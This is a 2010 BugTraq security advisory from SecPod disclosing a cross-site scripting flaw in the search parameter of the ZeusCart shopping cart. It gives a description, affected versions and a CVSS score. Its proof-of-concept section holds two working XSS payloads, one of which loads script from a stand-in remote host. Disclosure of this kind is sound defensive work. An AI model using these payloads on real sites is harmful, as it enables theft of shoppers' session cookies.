BugTraq
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability Aug 05 2010 12:13PM
SecPod Research (research secpod com)
Hi,

SecPod Research Team has found new vulnerability in ZeusCart Ecommerce
Shopping Cart Software.

Advisory details has been attached to this mail.

Regards,
SecPod Research Team
http://www.secpod.com/

#######################################################################
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability

SecPod Technologies (www.secpod.com)
Author Sooraj K.S
#######################################################################

SecPod ID: 1003 07/28/2010 Issue Discovered
07/30/2010 Vendor Notified
No Response from Vendor

Class: Cross-Site Scripting Severity: Medium

Overview:
---------
ZeusCart Ecommerce Shopping Cart Software is prone to cross-site scripting
vulnerability.

Technical Description:
----------------------
ZeusCart Ecommerce Shopping Cart Software is prone to a cross-site scripting
vulnerability because it fails to properly sanitize user-supplied input.

Input passed via the 'search' parameter in a 'search' action in index.php is
not properly verified before it is returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site. This may allow the attacker to steal cookie-based
authentication credentials and to launch other attacks.

The vulnerability has been tested in ZeusCart 3.0 and 2.3. Other versions may
also be affected.

Impact:
--------
Successful exploitation allows an attacker to execute arbitrary HTML and script
code in a user's browser session in the context of a vulnerable site.

Affected Software:
------------------
ZeusCart 3.0
ZeusCart 2.3

Tested on,
ZeusCart 3.0 and 2.3 (tested using Microsoft Internet Explorer browser)

Reference:
---------
http://www.zeuscart.com/
http://secpod.org/blog/?p=109
http://secpod.org/advisories/SECPOD_ZeusCart_XSS.txt

Proof of Concept:
-----------------
1)Input this code in search box and click search
'"%22%20style=x:expression(alert(document.cookie))><"
This script executed only on Microsoft Internet Explorer browser when tested
on ZeusCart 3.0 and 2.3

2) This example worked on ZeusCart version 2.3
http://www.example.com/?do=search&search='"><SCRIPT SRC=//REMOTE_SITE_SCRIPT>

Solution:
----------
Fix not available

Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Credits:
--------
Sooraj K.S of SecPod Technologies has been credited with the discovery of this
vulnerability.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus